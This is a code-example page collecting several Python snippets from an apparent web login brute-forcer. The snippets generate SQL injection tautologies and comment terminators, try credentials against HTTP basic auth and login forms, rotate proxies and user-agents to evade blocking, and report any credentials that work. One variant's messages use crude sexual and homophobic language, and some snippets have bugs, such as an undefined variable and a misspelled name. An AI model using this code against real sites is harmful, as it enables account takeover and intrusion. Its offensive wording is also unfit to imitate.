Esempio n. 1
0
    def sCon():
        conType = randomFromList(["equal", "static", "compare"])
        # Could be faster than create a dict and call element from dict
        if conType == "static":
            return randomFromList(["not false", "true"])

        elif conType == "compare":
            genType = randomFromList(["like", "rlike", "not like", "gl"])

            if genType == "gl":
                _stri1, _stri2 = srand(stype="dig"), srand(stype="dig")
                if int(_stri1) > int(_stri2):
                    return "%s > %s" % (_stri1, _stri2)
                else:
                    return "%s > %s" % (_stri2, _stri1)

            elif genType == "not like":
                while True:
                    _stri1, _stri2 = srand(stype="char"), srand(stype="char")
                    # MAKE SURE WE ARE HAVING NOT LIKE
                    if _stri1 != _stri2:
                        break
                return "'%s' %s '%s'" % (_stri1, genType, _stri2)

            else:
                _stri = srand(min=3, max=5, stype="char")
                return "'%s' %s '%s'" % (_stri, genType, _stri)

        elif conType == "equal":
            genType = randomFromList(["char", "dig"])
            _stri = srand(min=3, max=5, stype=genType)
            if genType == "char":
                return "'%s'='%s'" % (_stri, _stri)
            elif genType == "dig":
                return "%s=%s" % (_stri, _stri)
Esempio n. 2
0
def submit(options, loginInfo, creds, result):
	tryPassword, tryUsername = creds
	realm = loginInfo[0]
	fPassword, fUsername = loginInfo[1]
	for cred in list(result.queue):
		if tryUsername == cred[0]:
			return True # don't run if find password of username
	
	try:
		proc = mBrowser(options.timeout)
		if options.proxy:
			proxyAddr = randomFromList(options.proxy)
			proc.setproxy(proxyAddr)
		proc.httpget_passwd(options.url, tryUsername, tryPassword, realm)

		proc.open_url(options.url)
		if options.verbose:
			if options.proxy:
				printf("[+] {%s: %s; %s: %s through %s}" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')
			else:
				printf("[+] {%s: %s; %s: %s}" %(fUsername, tryUsername, fPassword, tryPassword), 'norm')
		printf("[*] %s [%s]" %([tryUsername, tryPassword], proc.title()), "good")
		result.put([options.url, tryUsername, tryPassword])

	except Exception as err:
		try:
			if type(err.code) == int and err.code == 401:
				if options.verbose:
					if options.proxy:
						printf("[+] {%s: %s; %s: %s through %s}" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')
						printf("[-] Failed: %s through %s" %([tryUsername, tryPassword], proxyAddr), "bad")
					else:
						printf("[+] {%s: %s; %s: %s}" %(fUsername, tryUsername, fPassword, tryPassword), 'norm')
						printf("[-] Failed: %s" %([tryUsername, tryPassword]), "bad")
			else:
				printf("[x] %s: %s" %(err, creds[::-1]), "bad")
		except:
			die("[x] HTTP GET:", err)
Esempio n. 3
0
def submit(options, loginInfo, creds, result):
	tryPassword, tryUsername = creds

	realm, [fPassword, fUsername] = loginInfo
	if tryUsername in [x[1] for x in list(result.queue)]:
		return True
	
	try:
		proc = Browser()
		if options.proxy:
			proxyAddr = randomFromList(options.proxy)
			proc.setproxy(proxyAddr)
		else:
			proxyAddr = ""
		# proc.httpget_passwd(options.url, tryUsername, tryPassword, realm) # BUG
		resp = proc.open_url(options.url, auth=(tryUsername, tryPassword))
		if options.verbose:
			if options.proxy:
				utils.printf("[+] [%s=(%s); %s=(%s)] <--> %s" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')

		if resp.status_code == 401:
			if options.verbose:
				if options.proxy:
					utils.printf("[-] Failed [%s=(%s); %s=(%s)] <--> %s" %(fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'bad')
		elif resp.status_code == 403:
			utils.printf("[x] 403 forbidden: [%s:%s] %s" %(tryUsername, tryPassword, proxyAddr), "bad")
		elif resp.status_code == 404:
			utils.printf("[x] 404 not found: [%s:%s] %s" %(tryUsername, tryPassword, proxyAddr), "bad")
		elif resp.status_code >= 500:
			utils.printf("[x] %s Server error: [%s:%s] <--> %s" %(resp.status_code, tryUsername, tryPassowrd, proxyAddr))
		else:
			utils.printf("[*] Found: [%s:%s] [%s] --> %s" %(tryUsername, tryPassword, proc.get_title(), proxyAddr), "good")
			result.put([options.url, tryUsername, tryPassword])

	except Exception as err:
		utils.die("[x] HTTP GET:", err)
Esempio n. 4
0
def submit(options, loginInfo, tryCred, result):
    # if options.engine == "mechanize":
    # 	from libs.mbrowser import mBrowser as Browser
    # 	proc = Browser(options.timeout) # TODO remove here
    # elif options.engine == "selenium":
    # 	from libs.sbrowser import sBrowser as Browser
    # 	proc = Browser() # TODO remove here
    # else:
    # 	pass # ERROR
    # #	Get login form field informations

    # frmLoginID, frmFields = loginInfo
    tryPassword, tryUsername = tryCred

    # proc = Browser(options.timeout) # TODO recovery here

    # BREAK if we had valid payload?
    # if options.options["-p"] == "sqli" and len(list(result.queue)) > 1:
    # 	return True

    for cred in list(result.queue):
        if tryUsername == cred[1]:
            return True

    try:
        proc = Browser(options.timeout)
        if options.proxy:
            # Set proxy connect
            proxyAddr = randomFromList(options.proxy)
            proc.setproxy(proxyAddr)
        proc.open_url(options.login_url)
        proc.get_opts(
            options)  # TODO remove this fucntion in sbrowser and mbrowser
        _form = parseLoginForm(proc.forms())
        if not _form:
            if options.verbose:
                printf(
                    "[x] LoginBrute: No login form found. Possibly get blocked!"
                )
            return False
        else:
            frmCtrl, frmFields = _form
            frmLoginID, btnSubmit = frmCtrl
        if options.verbose and loginInfo != _form:
            printf("[+] Warning: Form field has been changed!")
        #	Select login form
        # page_title = proc.title()
        #	Send request

        #	Reload the browser. For javascript redirection and others...
        # proc.reload()
        #	If no login form -> maybe success. Check conditions
        proc.xsubmit(frmCtrl, frmFields, tryCred)
        if options.verbose:
            if options.proxy:
                printf(
                    "[+] {%s: %s; %s: %s} through %s" %
                    (frmFields[1], tryUsername, frmFields[0], tryPassword,
                     proxyAddr), 'norm')
            else:
                if len(frmFields) == 2:
                    printf(
                        "[+] {%s: %s; %s: %s}" %
                        (frmFields[1], tryUsername, frmFields[0], tryPassword),
                        'norm')
                else:
                    printf("[+] {%s: %s}" % (frmFields[0], tryPassword),
                           'norm')

        if not parseLoginForm(proc.forms()):  # != loginInfo:
            test_result = check_condition(options, proc, loginInfo)
            if test_result == 1:
                #printf("[*] Page title: ['%s']" %(proc.title()), "good")
                # "If we tried login form with username+password field"
                if tryUsername:
                    printf(
                        "[*] %s [%s]" %
                        ([tryUsername, tryPassword], proc.get_title()), "good")
                # "Else If we tried login form with password field only"
                else:
                    printf("[*] %s []" % ([tryPassword], proc.get_title()),
                           "good")
                result.put([options.url, tryUsername, tryPassword])
            elif test_result == 2 and options.verbose:
                printf("[+] SQL Injection vulnerable found")
                printf("   %s" % ([tryUsername, tryPassword]), "norm")
            else:
                # Possibly Error. But sometime it is true
                if options.verbose:
                    printf(
                        "[x] Get error page: %s" %
                        ([tryUsername, tryPassword]), "bad")
                    printf("   [x] Page title: ['%s']" % (proc.get_title()),
                           "bad")

        # "Login form is still there. Oops"
        else:
            # TODO test if web has similar text (static)
            if check_sqlerror(proc.get_resp()) and options.verbose:
                printf("[+] SQL Injection vulnerable found")
                printf("   %s" % ([tryUsername, tryPassword]), "norm")
            if options.verbose:
                if options.proxy:
                    printf(
                        "[-] Failed: %s through %s" %
                        ([tryUsername, tryPassword], proxyAddr), "bad")
                else:
                    printf("[-] Failed: %s" % ([tryUsername, tryPassword]),
                           "bad")
        return True

    except Exception as error:
        """
			Sometimes, web servers return error code because of bad configurations,
			but our cred is true.
			This code block showing information, for special cases
		"""

        try:
            # Unauthenticated
            if type(err.code) == int and err.code == 401:
                if options.verbose:
                    printf("[-] Failed: %s" % ([tryUsername, tryPassword]),
                           "bad")
            # Server misconfiguration? Panel URL is deleted or wrong
            elif error.code == 404:
                printf("[x] %s: %s" % (error, tryCred[::-1]), "bad")
                if options.verbose:
                    printf("   %s" % (proc.geturl()), "bad")
            # Other error code
            else:
                if options.verbose:
                    printf("[x] (%s): %s" % (proc.geturl(), tryCred[::-1]),
                           "bad")
        except:
            # THIS BLOCKED BY WAF
            printf("[x] Loginbrute: %s" % (error), "bad")
            return False

    finally:
        proc.close()
Esempio n. 5
0
 def useragent(self):
     # Try random agent everytime it is called
     # TODO better useragent with library (or create my own - takes time)
     return randomFromList(data.getAgent().split("\n"))
Esempio n. 6
0
 def sEnd():
     return randomFromList(["-- --", "#", "--"])
Esempio n. 7
0
 def cCon():
     return randomFromList(["or", "||"])
Esempio n. 8
0
def submit(options, loginInfo, tryCred, result):
    # if options.tech == "mechanize":
    # 	from libs.mbrowser import mBrowser as Browser
    # elif options.tech == "selenium":
    # 	from libs.sbrowser import sBrowser as Browser

    # frmLoginID, frmFields = loginInfo
    tryPassword, tryUsername = tryCred

    # proc = Browser(options.timeout) # TODO recovery here

    # BREAK if we had valid payload?
    # if options.options["-p"] == "sqli" and len(list(result.queue)) > 1:
    # 	return True

    if tryUsername in [x[1] for x in list(result.queue)]:
        return True

    from libs.mbrowser import Browser
    try:
        proc = Browser()
        if options.proxy:
            # Set proxy connect
            proxyAddr = randomFromList(options.proxy)
            proc.setproxy(proxyAddr)
        else:
            proxyAddr = ""

        proc.open_url(options.login_url)
        _form = parseLoginForm(proc.forms())

        if not _form:
            if options.verbose:
                utils.printf(
                    "[!] Bruteforcer: No login form found, possibly get blocked by WAF of a sort"
                )
            return False

        else:

            frmCtrl, frmFields = _form
            frmLoginID, btnSubmit = frmCtrl
        if options.verbose and loginInfo != _form:
            utils.printf("[!] Warning: Login Forms field has been changed...")
        #	Select login form
        # page_title = proc.title()
        #	Send request

        #	Reload the browser. For javascript redirection and others...
        # proc.reload()
        #	If no login form -> maybe success. Check conditions

        resp = proc.xsubmit(frmCtrl, frmFields, tryCred)
        if options.verbose:
            if len(frmFields) == 2:
                utils.printf(
                    "[+] [%s=(%s); %s=(%s)] <--> %s" %
                    (frmFields[1], tryUsername, frmFields[0], tryPassword,
                     proxyAddr), 'norm')
            else:
                utils.printf(
                    "[+] [%s=(%s)] <--> %s" %
                    (frmFields[0], tryPassword, proxyAddr), 'norm')

        if not parseLoginForm(proc.forms()):  # != loginInfo:
            test_result = check_condition(options, proc, loginInfo)
            if test_result == 1:
                #utils.printf("[*] Page title: ['%s']" %(proc.title()), "good")
                # "If we tried login form with username+password field"

                if tryUsername:

                    if resp.status_code == 403:
                        utils.printf(
                            "[!] 403 Forbidden to touch titties: [%s:%s] <--> %s"
                            % (tryUsername, tryPassword, proxyAddr), "bad")

                    elif resp.status_code == 404:
                        utils.printf(
                            "[!] 404 titties not found... gayyyy: [%s:%s] <--> %s"
                            % (tryUsername, tryPassword, proxyAddr), "bad")

                    elif resp.status_code >= 500:
                        utils.printf(
                            "[!] %s Server error.. got slapped [%s:%s] <--> %s"
                            % (resp.status_code, tryUsername, tryPassword,
                               proxyAddr), "bad")

                    else:
                        utils.printf(
                            "[+] Found... BIG TITTIESSSS!!: [%s:%s] [%s]" %
                            (tryUsername, tryPassword, proc.get_title()),
                            "good")
                        result.put([options.url, tryUsername, tryPassword])

                # "Else If we tried login form with password field only"

                else:

                    if resp.status_code == 403:
                        utils.printf(
                            "[!] 403 Forbidden to touch titties: [%s:%s] %s" %
                            (tryUsername, tryPassword, proxyAddr), "bad")

                    elif resp.status_code == 404:
                        utils.printf(
                            "[!] 404 titties not found... gayyyy: [%s:%s] %s" %
                            (tryUsername, tryPassword, proxyAddr), "bad")

                    elif resp.status_code >= 500:
                        utils.printf(
                            "[!] %s Server error.. got slapped: [%s:%s] %s" %
                            (resp.status_code, tryUsername, tryPassword,
                             proxyAddr), "bad")

                    else:
                        utils.printf(
                            "[+] Found... BIG TITTIESSSS!!: [%s] [%s]" %
                            (tryPassword, proc.get_title()), "good")
                        result.put([options.url, tryUsername, tryPassword])

            elif test_result == 2 and options.verbose:
                utils.printf(
                    "[+] SQL Injection vulnerability found in login or system. you already know what that means ;) "
                )
                utils.printf("   %s" % ([tryUsername, tryPassword]), "norm")

            else:
                # Possibly a stupid error but sometimes it COULD be true .-.
                if options.verbose:
                    utils.printf(
                        "[!] Get error page: %s" %
                        ([tryUsername, tryPassword]), "bad")
                    utils.printf(
                        "   [*] Page title: ['%s']" % (proc.get_title()),
                        "bad")
        # "Login form might still be there soo uhh... i made an oopsie??"
        else:

            # TODO test if web has similar text (static)

            if check_sqlerror(proc.get_resp()) and options.verbose:
                utils.printf(
                    "[+] SQL Injection vulnerability found in login or system. you already know what that means ;) "
                )
                utils.printf("   %s" % ([tryUsername, tryPassword]), "norm")
            if options.verbose:
                if tryUsername:
                    utils.printf(
                        "[-] Failed: [%s:%s] <--> %s ==> %s" %
                        (tryUsername, tryPassword, proxyAddr,
                         proc.get_title()), "bad")
                else:
                    utils.printf(
                        "[-] Failed: [%s] <--> %s ==> %s" %
                        (tryPassword, proxyAddr, proc.get_title()), "bad")

        return True

    except Exception as error:
        """
			Sometimes, web servers return error code because of bad configurations,
			but our cred is true.
			This code block showing information, for special cases
		"""

        try:
            # Unauthenticated
            if type(err.code) == int and err.code == 401:
                if options.verbose:
                    utils.printf(
                        "[-] Failed: %s" % ([tryUsername, tryPassword]), "bad")
            # Server misconfiguration or owner is stupid? Panel URL is deleted or wrong.. if so f**k them!

            elif error.code == 404:
                utils.printf("[x] %s: %s" % (error, tryCred[::-1]), "bad")
                if options.verbose:
                    utils.printf("   %s" % (proc.url()), "bad")
            # Other error code
            else:
                if options.verbose:
                    utils.printf("[x] (%s): %s" % (proc.url(), tryCred[::-1]),
                                 "bad")
        except:
            # THIS BLOCKED BY WAF
            utils.printf("[x] Loginbrute: %s" % (error), "bad")
            return False

    finally:
        proc.close()